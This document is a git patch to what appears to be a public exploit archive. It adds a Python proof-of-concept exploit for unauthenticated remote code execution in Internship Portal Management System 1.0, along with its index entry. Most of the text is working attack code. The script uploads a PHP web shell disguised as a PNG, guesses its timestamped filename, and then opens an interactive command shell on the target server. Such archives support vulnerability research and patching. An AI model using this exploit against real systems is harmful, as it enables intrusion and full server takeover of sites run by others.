From b8cf9ea0fcc49cc72c9270665ed296a12567753b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 May 2021 05:01:52 +0000 Subject: [PATCH] DB: 2021-05-05 1 changes to exploits/shellcodes Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) --- exploits/php/webapps/49823.py | 74 +++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 75 insertions(+) create mode 100755 exploits/php/webapps/49823.py diff --git a/exploits/php/webapps/49823.py b/exploits/php/webapps/49823.py new file mode 100755 index 000000000..e302637fc --- /dev/null +++ b/exploits/php/webapps/49823.py @@ -0,0 +1,74 @@ +# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) +# Date: 2021-05-04 +# Exploit Author: argenestel +# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code +# Version: 1.0 +# Tested on: Debian 10 + +import requests +import time + +#change the url to the site running the vulnerable system +url="http://127.0.0.1:4000" +#burp proxy +proxies = { + "http": "http://127.0.0.1:8080", +} +#payload +payload='"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>' + +#the upload point +insert_url=url+"/inserty.php" + +def fill_details(): + global payload + global shellend + global shellstart + print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload") + #time start + shellstart=int(time.time()) + #print(shellstart) + files = {'file':('shell.php',payload, + 'image/png', {'Content-Disposition': 'form-data'} + ) + } + data = { + "company_name":"some", + "first_name":"some", + "last_name":"some", + "email":"some@some.com", + "gender":"Male", + "insert_button":"Apply", + "terms":"on" + } + r = requests.post(insert_url, data=data, files=files) + if r.status_code == 200: + print("Exploited Intern System Successfully...") + shellend = int(time.time()) + #print(shellend) + shell() + else: + print("Exploit Failed") + +def shell(): + for shellname in range(shellstart, shellend+1): + shellstr=str(shellname) + shell_url=url+"/upload/"+shellstr+"_shell.php" + r = requests.get(shell_url) + if r.status_code == 200: + shell_url=url+"/upload/"+shellstr+"_shell.php" + break + + r = requests.get(shell_url) + if r.status_code == 200: + print("Shell Starting...") + while True: + cmd=input("cmd$ ") + r = requests.get(shell_url+"?cmd="+cmd) + print(r.text) + else: + print("File Name Error") + + +fill_details() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 22a3745e5..441139a4f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43990,3 +43990,4 @@ id,file,description,date,author,type,platform,port 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php, 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby, 49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby, +49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,